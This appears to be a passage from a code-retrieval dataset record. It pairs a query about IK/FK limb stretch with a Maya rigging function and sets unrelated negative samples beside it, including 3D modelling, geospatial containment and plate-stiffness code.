create hub\n hub_zero, hub_plc, hub_jnt = self.guide_joint('wheelhub', alt_prefix=prefix, constraint_type='point')\n hub_end_zero, hub_end_plc, hub_end_jnt = self.guide_joint('wheelhub_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(hub_end_zero, r=1, t=[1,0,0])\n mc.parent(hub_end_jnt, hub_jnt)\n mc.aimConstraint(hub_end_plc, hub_jnt, aim=[mirror_value,0,0], u=[0,1,0], wu=[0,1,0], wut='vector')\n mc.parentConstraint(hub_plc, hub_end_zero , mo=1)\n\n # Create steering arm\n steer_zero, steer_plc, steer_jnt = self.guide_joint('steeringArm', alt_prefix=prefix, constraint_type='parent')\n mc.xform(steer_zero, r=1, t=[-1,0,0])\n mc.parent(hub_jnt, steer_jnt)\n\n # Create shocks\n shock_a_zero, shock_a_plc, shock_a_jnt = self.guide_joint('shock_A', alt_prefix=prefix, constraint_type='point')\n shock_b_zero, shock_b_plc, shock_b_jnt = self.guide_joint('shock_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(shock_a_zero, ws=1, t=[-2,2,0])\n mc.xform(shock_b_zero, ws=1, t=[-0.5,0.25,0])\n\n mc.parent(shock_b_jnt, shock_a_jnt)\n\n mc.aimConstraint(shock_b_plc, shock_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n mc.aimConstraint(shock_a_plc, shock_b_jnt, aim=[-mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # upper arm\n up_arm_zero, up_arm_plc, up_arm_jnt = self.guide_joint('upperArm', alt_prefix=prefix, constraint_type='point')\n up_arm_end_zero, up_arm_end_plc, up_arm_end_jnt = self.guide_joint('upperArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(up_arm_end_zero, r=1, t=[-3.5,1,0])\n mc.xform(up_arm_zero, r=1, t=[-1,0.5,0])\n mc.parent(up_arm_end_jnt, up_arm_jnt)\n mc.aimConstraint(up_arm_end_plc, up_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=up_arm_plc)\n\n # lower arm\n lo_arm_zero, lo_arm_plc, lo_arm_jnt = self.guide_joint('lowerArm', alt_prefix=prefix, constraint_type='point')\n lo_arm_end_zero, lo_arm_end_plc, lo_arm_end_jnt = self.guide_joint('lowerArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(lo_arm_end_zero, r=1, t=[-4,-0.5,0])\n mc.xform(lo_arm_zero, r=1, t=[-1,-0.5,0])\n mc.parent(lo_arm_end_jnt, lo_arm_jnt)\n mc.aimConstraint(lo_arm_end_plc, lo_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=lo_arm_plc)\n\n # steeringArm\n if enable_steering:\n steeringArm_a_zero, steeringArm_a_plc, steeringArm_a_jnt = self.guide_joint('steeringArm_A', alt_prefix=prefix, constraint_type='point')\n steeringArm_b_zero, steeringArm_b_plc, steeringArm_b_jnt = self.guide_joint('steeringArm_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(steeringArm_b_zero, r=1, t=[-1.5,0,1])\n mc.xform(steeringArm_a_zero, r=1, t=[-4,0,1])\n\n mc.parent(steeringArm_b_jnt, steeringArm_a_jnt)\n mc.aimConstraint(steeringArm_b_plc, steeringArm_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # Create control\n zero, ctrl = self.guide_ctrl('wheel', alt_prefix=prefix, driver=hub_end_jnt, color=color, shape='circle', axis='X', scale=[3]*3, create_pivot=0)\n mc.setAttr(ctrl+'.numOffsetCtrls', 1)\n mc.addAttr(ctrl+'.numOffsetCtrls', e=1, min=1)\n mc.xform(ctrl.replace('_CTL','_A_OFF_CTL.cv[*]'), r=1, s=[0.8]*3)\n\n control.create_shape('wheel', ctrl, axis='X', scale=[3]*3)\n\n #suspension_zero, suspension_ctrl = self.guide_ctrl('suspension', create_pivot=0, driver=shock_a_jnt, axis='X', shape='pyramid', color=color, scale=[1.5,1,1], alt_prefix=prefix)\n ground_zero, ground_ctrl = self.guide_ctrl('ground', create_pivot=0, shape='square', color='grass', alt_prefix=prefix)\n mc.delete(mc.pointConstraint(hub_jnt, ground_zero))\n\n # constraint to placer\n childs = [prefix+'_wheelhub_JNT_PLC_ZERO',\n prefix+'_steeringArm_JNT_PLC_ZERO',\n prefix+'_shock_A_JNT_PLC_ZERO',\n prefix+'_shock_B_JNT_PLC_ZERO',\n prefix+'_upperArm_JNT_PLC_ZERO',\n prefix+'_upperArm_end_JNT_PLC_ZERO',\n prefix+'_lowerArm_JNT_PLC_ZERO',\n prefix+'_lowerArm_end_JNT_PLC_ZERO']\n\n for c in childs:\n mc.parentConstraint(l_main_plc, c, mo=1)\n\n mc.setAttr(l_main_plc+'.offsetTranslateY', mirror_value*0.5)\n\n # ################3\n # Place it all\n hub_pos = mc.ls(options.get('hubCenter') or '')\n if hub_pos:\n loc = utils.snap_locator(hub_pos)\n mc.delete(mc.pointConstraint(loc, self.guide_master))\n mc.setAttr(self.guide_master+'.tx', 0)\n mc.delete(mc.pointConstraint(loc, l_main_plc), loc)\n\n hub_end_pos = mc.ls(options.get('hubEndCenter') or '')\n if hub_end_pos:\n loc = utils.snap_locator(hub_end_pos)\n mc.delete(mc.pointConstraint(loc, hub_end_plc), loc)\n\n else:\n mc.xform(self.guide_master, ws=1, t=[0,2,10])\n mc.xform(l_main_plc, r=1, t=[mirror_value*6,0,0])\n\n mc.setAttr(self.guide_master+'.jointAxisVis', 1)\n\n l = utils.snap_locator(hub_jnt)\n mc.setAttr(l+'.ty', 0)\n mc.delete(mc.pointConstraint(l, ground_zero), l)\n\n chassis_plc_zero, chassis_plc = self.guide_joint('chassis_driver', placer_only=1)\n mc.setAttr(chassis_plc+'.radius', 1)\n mc.setAttr(chassis_plc+'.color', 0.96, 0.71, .01)\n mc.setAttr(chassis_plc+'.otherType', 'Leg IK Driver', type='string');\n mc.setAttr(chassis_plc+'.type', 18)\n\n mc.pointConstraint(l_prefix+'_lowerArm_end_JNT_PLC', r_prefix+'_lowerArm_end_JNT_PLC', chassis_plc_zero)\n utils.set_attrs(chassis_plc, l=1, k=0)\n\n # This finalizes your guide.\n self.finalize_guide()\n self.mirror_guide()", "def make_stair(nstep,treadDept,riserHeight,landingLength,stepWidth,n):\n\tstep = MKPOL([[[0,0],[0,riserHeight],[2*treadDept,riserHeight], [treadDept,0]],[[1,2,3,4]],1])\n\tstep1 = MKPOL([[[0,0],[0,riserHeight],[treadDept,2*riserHeight], [treadDept,riserHeight]],[[1,2,3,4]],1])\n\tstep = PROD([QUOTE([stepWidth]),step])\n\tstep = TEXTURE(\"texture/Liptus.jpg\")(step)\n\thandrailTop = PROD([QUOTE([stepWidth/15.0]),step1])\n\thandrail = CIRCLE(stepWidth/30.0)([20,20])\n\n\thandrail = PROD([QUOTE([1]),handrail])\n\n\thandrail = R([1,3])(PI/2)(handrail)\n\thandrail = T([1,2,3])([stepWidth-(stepWidth/30.0),treadDept/2,riserHeight])(handrail)\n\thandrail = COLOR(BLACK)(handrail)\n\tstep = STRUCT([step,handrail])\n\thandrailTop = R([2,3])(PI)(handrailTop)\n\thandrailTop = T([1,2,3])([stepWidth-(stepWidth/15.0),treadDept,1+2*riserHeight])(handrailTop)\n\thandrailTop = TEXTURE(\"texture/Liptus.jpg\")(handrailTop)\n\tstep = STRUCT([step,handrailTop])\n\tstair = [step]\n\tif n == 0:\n\t\tstair = []\n\t\"\"\" realization total step \"\"\"\n\tfor i in range(nstep):\n\t\tstep = T([2,3])([treadDept,riserHeight])(step)\n\t\tstair.append(step)\n\tfinalStep = T([2,3])([(treadDept*(nstep+1)),(riserHeight*(nstep))])(CUBOID([stepWidth,landingLength,riserHeight]))\n\tfinalStep = TEXTURE(\"texture/Liptus.jpg\")(finalStep)\n\tstair.append(finalStep)\n\treturn STRUCT(stair)" ]
[ "0.6122613", "0.60881704", "0.5706191", "0.5586057", "0.554519", "0.55225635", "0.55225635", "0.54242057", "0.54017335", "0.5394755", "0.5353252", "0.52999943", "0.52834505", "0.52750146", "0.524787", "0.5220676", "0.5217967", "0.51952493", "0.51629597", "0.5109538", "0.5100428", "0.5094992", "0.5077157", "0.50667536", "0.5065042", "0.50447977", "0.50394416", "0.50359344", "0.50189936", "0.5017399", "0.50134295", "0.50124794", "0.49903733", "0.49891877", "0.4978869", "0.4975615", "0.4960682", "0.49603075", "0.49596918", "0.495891", "0.49561992", "0.49484596", "0.49445355", "0.49401549", "0.49300483", "0.49278226", "0.4915566", "0.49132022", "0.48980662", "0.48945427", "0.48929912", "0.48920074", "0.48873815", "0.48869705", "0.48858416", "0.48726046", "0.48672038", "0.48610786", "0.48603994", "0.48525825", "0.4847859", "0.48275584", "0.48267615", "0.48229527", "0.4818337", "0.48158106", "0.48152143", "0.48034924", "0.48030218", "0.4802689", "0.4802371", "0.4797963", "0.4797196", "0.47926602", "0.47855768", "0.4785363", "0.47851047", "0.47846082", "0.47804984", "0.4764962", "0.47552463", "0.47448727", "0.4742041", "0.4740054", "0.47389486", "0.47388452", "0.47376028", "0.47365215", "0.47332388", "0.47319803", "0.47195834", "0.4718834", "0.47161838", "0.4715655", "0.47131845", "0.47097987", "0.47094414", "0.47077584", "0.47060627", "0.47011113" ]
0.66334
0
Create IK FK Streatch for limbs with more than two bines
def multi_joint_stretch(ik_ctrl, ik_last_node, switch_ctrl, fk_ctrls, jnts, ik_handle): root_grp = utils.get_parent(jnts[0]) stretch_jnts = jnts[1:] stretch_fk_ctrls = fk_ctrls[1:] # create attrs attrs = ['upStretch','loStretch'] for i in reversed(range(len(stretch_jnts)-2)): ltr = '' if i > 0: ltr = utils.letters[i] attrs.insert(1, 'midStretch'+ltr) if not mc.objExists(ik_ctrl+'.autoStretch'): mc.addAttr(ik_ctrl, ln='autoStretch', at='double', min=0, max=1, k=1) for i in range(len(stretch_jnts)): if not mc.objExists(ik_ctrl+'.'+attrs[i]): mc.addAttr(ik_ctrl, ln=attrs[i], at='double', dv=1, min=0.001, k=1) for fk_ctrl in fk_ctrls[:-1]: if not mc.objExists(fk_ctrl+'.stretch'): mc.addAttr(fk_ctrl, ln='stretch', at='double', dv=1, min=0.001, k=1) # store initial length of joint init_lengths = [mc.getAttr(j+'.tx') for j in stretch_jnts] abs_init_lengths = [abs(v) for v in init_lengths] total_init_length = 0 for v in init_lengths: total_init_length += v abs_total_init_length = abs(total_init_length) # Create dist reader root_to_end_dist = utils.create_distance_reader(root_grp, ik_last_node) auto_stretch_clamp = mc.createNode('clamp') mc.setAttr(auto_stretch_clamp+'.minR', 1) mc.setAttr(auto_stretch_clamp+'.maxR', 10000000) mc.connectAttr(root_to_end_dist+'.stretchFactor', auto_stretch_clamp+'.inputR') mc.addAttr(ik_ctrl, ln='stretchFactor', k=0) mc.connectAttr(auto_stretch_clamp+'.inputR', ik_ctrl+'.stretchFactor') pma = mc.createNode('plusMinusAverage') utils.connect_abs(pma+'.output1D', root_to_end_dist+'.jointChainLength') # handle soft ik handle constraint override pc = mc.pointConstraint(ik_last_node, ik_handle)[0] if mc.objExists(jnts[0]+'.softIkChainLength'): # compensate chain length - feed in new chain length for soft ik chain length utils.connect_abs(pma+'.output1D', jnts[0]+'.softIkChainLength') # blend off the soft ik constraint IF im in auto stretch mc.connectAttr(ik_ctrl+'.autoStretch', pc+'.w1') utils.connect_reverse(pc+'.w1', pc+'.w0') # easy stuff first - create fk stretch nodes fk_to_ik_blends = [] # This is the final output for IK stretch for i, jnt in enumerate(stretch_jnts): # easy stuff first - create fk stretch nodes fk_mdl = mc.createNode('multDoubleLinear') mc.setAttr(fk_mdl+'.input1', mc.getAttr(jnt+'.tx')) mc.connectAttr(fk_ctrls[i]+'.stretch', fk_mdl+'.input2') utils.connect_abs(fk_mdl+'.output', fk_ctrls[i+1]+'_ZERO.tx') # Create user secifed IK stretch user_ik_scale_mdl = mc.createNode('multDoubleLinear') mc.setAttr( user_ik_scale_mdl+'.input1', init_lengths[i]) mc.connectAttr(ik_ctrl+'.'+attrs[i], user_ik_scale_mdl+'.input2') # Now create the IK auto stretch nodes auto_stretch_mdl = mc.createNode('multDoubleLinear') mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_mdl+'.input1', f=1) mc.connectAttr(auto_stretch_clamp+'.outputR', auto_stretch_mdl+'.input2', f=1) mc.connectAttr(user_ik_scale_mdl+'.output', '{0}.input1D[{1}]'.format(pma, i)) fk_to_ik_blend = mc.createNode('blendTwoAttr') auto_stretch_blend = mc.createNode('blendTwoAttr') mc.connectAttr(switch_ctrl+'.IK', fk_to_ik_blend+'.attributesBlender') mc.connectAttr(fk_mdl+'.output', fk_to_ik_blend+'.input[0]') mc.connectAttr(auto_stretch_blend+'.output', fk_to_ik_blend+'.input[1]') mc.connectAttr(ik_ctrl+'.autoStretch', auto_stretch_blend+'.attributesBlender') mc.connectAttr(user_ik_scale_mdl+'.output', auto_stretch_blend+'.input[0]') mc.connectAttr(auto_stretch_mdl+'.output', auto_stretch_blend+'.input[1]') fk_to_ik_blends.append(fk_to_ik_blend+'.output') for i, jnt in enumerate(stretch_jnts): mc.connectAttr(fk_to_ik_blends[i], jnt+'.tx')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def boundary(self):\n answer = self.zero()\n for k, v in self.items():\n for idx, cube in enumerate(k):\n acc_dim = sum((cube_l.dimension for cube_l in k[:idx]))\n for i in range(cube.dimension):\n for epsilon in (0, 1):\n new_cube = cube.face(i, epsilon)\n new_k = k[:idx] + (new_cube,) + k[idx + 1:]\n sign_exp = (acc_dim + i + epsilon) % 2\n answer += answer.create({new_k: v * (-1)**sign_exp})\n return answer", "def find_new_kbl(self):\n [Ly,N] = self.b.shape\n z_u_w = self.grid_dict['z_u_w']\n z_u_r = self.grid_dict['z_u_r']\n\n #---> j loop\n for j in range(Ly):\n self.kbl[j] = N #initialize search at top\n\n # in fortran k=N-1,1,-1\n for k in range(N-1,0,-1):\n #INDEX MAP\n k_w = k\n k_r = k-1\n \n for j in range(Ly):\n if z_u_w[j,k_w] > z_u_w[j,N] - self.hbls[j]:\n self.kbl[j] = k_w", "def build_block_cross(self):\n from ambry.geo.util import find_geo_containment, find_containment\n from geoid import civick \n\n lr = self.init_log_rate(3000)\n\n def gen_bound():\n \n boundaries = self.library.dep('blockgroups').partition\n\n # Note, ogc_fid is the primary key. The id column is created by the shapefile. \n for i,boundary in enumerate(boundaries.query(\n \"SELECT AsText(geometry) AS wkt, gvid FROM blockgroups\")):\n lr('Load rtree')\n \n yield i, boundary['wkt'] , boundary['gvid'] \n \n def gen_points():\n\n for row in self.partitions.find(table = 'facilities_addresses').rows:\n if row['longitude'] and row['latitude']:\n yield (row['longitude'], row['latitude']), row['facilities_id']\n\n\n p = self.partitions.find_or_new(table='facilities_geoids')\n p.clean()\n\n with p.inserter() as ins:\n for point, point_o, cntr_geo, cntr_o in find_containment(gen_bound(),gen_points()):\n\n blockgroup_gvid = civick.Blockgroup.parse(cntr_o)\n tract_gvid = blockgroup_gvid.convert(civick.Tract)\n county_gvid = blockgroup_gvid.convert(civick.County)\n \n ins.insert(dict(facilities_id = point_o, \n blockgroup_gvid = str(blockgroup_gvid),\n tract_gvid = str(tract_gvid),\n county_gvid = str(county_gvid)\n ))\n \n lr('Marking point containment')", "def k_b(self):\n\n b = self.width()/2\n c = self.height()/2\n\n Ex = self.E\n Ey = self.E\n nu_xy = self.nu\n nu_yx = self.nu\n G = self.E/(2*(1 + self.nu))\n t = self.t\n\n # Stiffness matrix for plate bending. This matrix was derived using a jupyter notebook. The\n # notebook can be found in the `Derivations`` folder of this project.\n k = t**3/12*array([[(-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2 + Ey*nu_xy*b**2/2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), (-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 - 10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), (Ex*c**2/2 - Ey*nu_xy*b**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(-Ey*nu_xy*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), Ey*nu_xy/(nu_xy*nu_yx - 1), (Ey*nu_xy*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0],\n [(Ex*nu_yx*b**2/2 + Ex*c**2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*nu_xy*nu_yx*b**2 - 2*G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), (-5*Ex*c**2 + G*nu_xy*nu_yx*b**2 - G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), 0, 2*(-5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2/2 + Ex*c**2/2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))],\n [(5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ex*c**2 + G*nu_xy*nu_yx*b**2 - G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-Ex*c**2 - Ey*nu_xy*b**2/2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 - 10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), (-Ex*c**2/2 + Ey*nu_xy*b**2/2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(Ey*nu_xy*c**2/2 - Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-Ey*nu_xy*c**2/2 - Ey*b**2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), -Ey*nu_xy/(nu_xy*nu_yx - 1), (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0],\n [(5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(5*b**2*c*(nu_xy*nu_yx - 1)), 0, 2*(-5*Ex*c**2 - G*nu_xy*nu_yx*b**2 + G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2/2 - Ex*c**2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), -Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*nu_xy*nu_yx*b**2 - 2*G*b**2)/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*nu_yx*b**2/2 - Ex*c**2/2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))],\n [(-5*Ex*nu_yx*b**2*c**2 + 10*Ex*c**4 - 5*Ey*nu_xy*b**2*c**2 + 10*Ey*b**4 + 28*G*nu_xy*nu_yx*b**2*c**2 - 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), -(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 - 10*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 + 20*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), (-5*Ex*c**2 - 25*Ey*nu_xy*b**2 + 2*b**2*(15*Ey*nu_xy - G*nu_xy*nu_yx + G))/(10*b**2*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2*c**2/4 - Ex*c**4 - Ey*nu_xy*b**2*c**2/4 - Ey*b**4 + 7*G*nu_xy*nu_yx*b**2*c**2/5 - 7*G*b**2*c**2/5)/(b**3*c**3*(nu_xy*nu_yx - 1)), (Ex*nu_yx*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-Ex*c**2 - Ey*nu_xy*b**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), (5*Ex*nu_yx*b**2*c**2 + 20*Ex*c**4 + 5*Ey*nu_xy*b**2*c**2 - 10*Ey*b**4 - 28*G*nu_xy*nu_yx*b**2*c**2 + 28*G*b**2*c**2)/(20*b**3*c**3*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-Ex*c**2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1))],\n [(-Ey*b**2/2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), (-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (-5*Ey*b**2 + G*nu_xy*nu_yx*c**2 - G*c**2)/(5*b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - G*nu_xy*nu_yx*c**2 + G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0, (Ey*nu_xy*c**2/2 + Ey*b**2 - G*nu_xy*nu_yx*c**2/5 + G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 4*(-5*Ey*b**2 + 2*G*nu_xy*nu_yx*c**2 - 2*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), Ey*nu_xy/(nu_xy*nu_yx - 1), (-Ey*nu_xy*c**2/2 + Ey*b**2/2 + G*nu_xy*nu_yx*c**2/5 - G*c**2/5)/(b*c**2*(nu_xy*nu_yx - 1)), 2*(-5*Ey*b**2 - 4*G*nu_xy*nu_yx*c**2 + 4*G*c**2)/(15*b*c*(nu_xy*nu_yx - 1)), 0],\n [(Ex*c**2/2 + G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, (-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*nu_yx*b**2/2 - Ex*c**2/2 - G*nu_xy*nu_yx*b**2/5 + G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 8*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (-Ex*nu_yx*b**2/2 - Ex*c**2 + G*nu_xy*nu_yx*b**2/5 - G*b**2/5)/(b**2*c*(nu_xy*nu_yx - 1)), Ex*nu_yx/(nu_xy*nu_yx - 1), 4*(-5*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1)), (Ex*c**2 - G*b**2*(nu_xy*nu_yx - 1)/5)/(b**2*c*(nu_xy*nu_yx - 1)), 0, -(10*Ex*c**2 + 2*G*b**2*(nu_xy*nu_yx - 1))/(15*b*c*(nu_xy*nu_yx - 1))],\n [(5*Ex*nu_yx*b**2*c**2 - 